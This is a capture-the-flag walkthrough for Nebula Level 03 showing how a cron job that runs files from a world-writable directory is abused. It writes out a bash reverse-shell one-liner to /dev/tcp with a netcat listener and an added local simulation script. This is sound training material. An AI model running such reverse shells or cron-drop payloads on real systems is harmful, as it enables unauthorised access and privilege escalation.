Exploit Exercises: Nebula Level 03
Check the home directory of flag03 and take note of the files there.
There is a crontab that is called every couple of minutes.
To do this level, log in as the level03 account with the password level03. Files for this level can be found in /home/flag03.
Source code
There is no source code available for this level
Solution
Let’s jump in!
level03@nebula:/home/flag03$ ls -al
total 6
drwxr-x--- 3 flag03 level03 103 Nov 20 2011 .
drwxr-xr-x 1 root root 80 Aug 27 2012 ..
-rw-r--r-- 1 flag03 flag03 220 May 18 2011 .bash_logout
-rw-r--r-- 1 flag03 flag03 3353 May 18 2011 .bashrc
-rw-r--r-- 1 flag03 flag03 675 May 18 2011 .profile
drwxrwxrwx 2 flag03 flag03 3 Aug 18 2012 writable.d
-rwxr-xr-x 1 flag03 flag03 98 Nov 20 2011 writable.sh
Interesting! Let’s get more info about the task.
level03@nebula:/home/flag03$ cat writable.sh
#!/bin/sh
for i in /home/flag03/writable.d/* ; do
(ulimit -t 5; bash -x "$i")
rm -f "$i"
done
level03@nebula:/home/flag03$ cd ./writable.d/
level03@nebula:/home/flag03/writable.d$ ls -al
total 0
drwxrwxrwx 2 flag03 flag03 3 Aug 18 2012 .
drwxr-x--- 3 flag03 level03 103 Nov 20 2011 ..
level03@nebula:/home/flag03/writable.d$
We were told at the start that a crontab runs every couple of minutes. But what is a crontab?
Wikipedia: The software utility Cron is a time-based job scheduler in Unix-like computer operating systems. People who set up and maintain software environments use cron to schedule jobs (commands or shell scripts) to run periodically at fixed times, dates, or intervals. It typically automates system maintenance or administration—though its general-purpose nature makes it useful for things like downloading files from the Internet and downloading email at regular intervals.
A user's crontab lives under /var/spool/cron/crontabs, which other users cannot read, so we cannot confirm the job directly as level03. The only script in flag03's home directory is writable.sh, though, so we will assume that is the scheduled job and that it runs as flag03. Let's look at the code again:
#!/bin/sh
for i in /home/flag03/writable.d/* ; do
(ulimit -t 5; bash -x "$i") (1)
rm -f "$i" (2)
done
Simple enough. At (1) every file in /home/flag03/writable.d/ is run with bash -x inside a subshell limited to 5 seconds of CPU time, and at (2) that file is deleted. The directory listing above showed writable.d is world-writable (drwxrwxrwx), so anything we drop there is executed as flag03 on the next cron run and then removed. Note that ulimit -t bounds CPU time, not wall-clock time, so an interactive shell that spends its life blocked on a socket is not killed by it. Let's get a shell!
lucian@vm:~$ nc -nvlp 8080
Listening on [0.0.0.0] (family 0, port 8080)
Now let's prepare our script. 192.168.0.104 is the address of the machine running the listener, and the payload simply connects an interactive bash back to it:
level03@nebula:/home/flag03$ cd writable.d/
level03@nebula:/home/flag03/writable.d$ echo "bash -i >& /dev/tcp/192.168.0.104/8080 0>&1" > shell.sh
level03@nebula:/home/flag03/writable.d$ cat shell.sh
bash -i >& /dev/tcp/192.168.0.104/8080 0>&1
Done. Now we wait a few minutes for the next cron run; writable.sh will execute shell.sh as flag03, which connects back to our listener, and then delete it.
lucian@vm:~$ nc -nvlp 8080
Listening on [0.0.0.0] (family 0, port 8080)
Connection from [192.168.0.100] port 8080 [tcp/*] accepted (family 2, sport 45702)
bash: no job control in this shell
flag03@nebula:~$ id
id
uid=996(flag03) gid=996(flag03) groups=996(flag03)
flag03@nebula:~$ getflag
getflag
You have successfully executed getflag on a target account
flag03@nebula:~$
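The primitive behind this level, reproduced as an added example that is not part of the original walkthrough: a privileged job that executes and then deletes whatever lands in a world-writable directory. The script below builds a throwaway copy of the flag03 layout under a temporary directory (the paths and the results file are assumptions made for a self-contained run), reuses the writable.sh loop with only the directory path changed, and drops a payload that needs no network listener: it writes the output of id to a results file, the variant to use when the target cannot reach your machine. One run of the stand-in "cron" job then shows both effects the page describes, the payload runs and the dropped file is consumed.

```bash
#!/bin/bash
# Added example, not code from the Nebula walkthrough: a local simulation of
# the Level 03 primitive. A "cron" loop copied from writable.sh runs every file
# in a world-writable drop directory and then deletes it. All paths live under
# a mktemp directory (assumption), so nothing touches /home/flag03.

set -u

# Build a throwaway copy of the flag03 layout (constructed, not the real VM).
setup_lab() {
    LAB="$(mktemp -d)"
    mkdir -p "$LAB/writable.d"
    chmod 777 "$LAB/writable.d"      # same drwxrwxrwx as on the target
    # Local copy of writable.sh; only the directory path is parameterised.
    cat > "$LAB/writable.sh" <<EOF
#!/bin/sh
for i in $LAB/writable.d/* ; do
    (ulimit -t 5; bash -x "\$i")
    rm -f "\$i"
done
EOF
    chmod 755 "$LAB/writable.sh"
    echo "$LAB"
}

# Drop the payload: record 'id' into a results file instead of opening a socket.
drop_payload() {
    lab="$1"
    printf 'id > %s/result.txt 2>&1\n' "$lab" > "$lab/writable.d/shell.sh"
}

# Stand in for the cron daemon: one invocation of the scheduled job.
run_cron_once() {
    lab="$1"
    sh "$lab/writable.sh" 2>/dev/null   # bash -x tracing goes to stderr
}

# Return 0 if the payload ran (results file holds a uid line) and was consumed.
payload_executed() {
    lab="$1"
    [ -s "$lab/result.txt" ] \
        && grep -q '^uid=' "$lab/result.txt" \
        && [ ! -e "$lab/writable.d/shell.sh" ]
}

# Drive the simulation and print what a practitioner would check by hand.
demo() {
    lab="$(setup_lab)"
    drop_payload "$lab"
    run_cron_once "$lab"
    cat "$lab/result.txt"
    payload_executed "$lab" && echo "payload ran and was removed by writable.sh"
    rm -rf "$lab"
}

demo
```

On the real target the same drop-and-wait works with the results file placed somewhere world-readable such as /tmp and getflag in place of id; because writable.sh removes the file after each run, a payload that fails must be dropped again before the next cron tick. The ulimit -t 5 in the loop bounds CPU time only, so a reverse shell that blocks on its socket survives it, while a busy loop would be killed.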
See you in the next tutorial!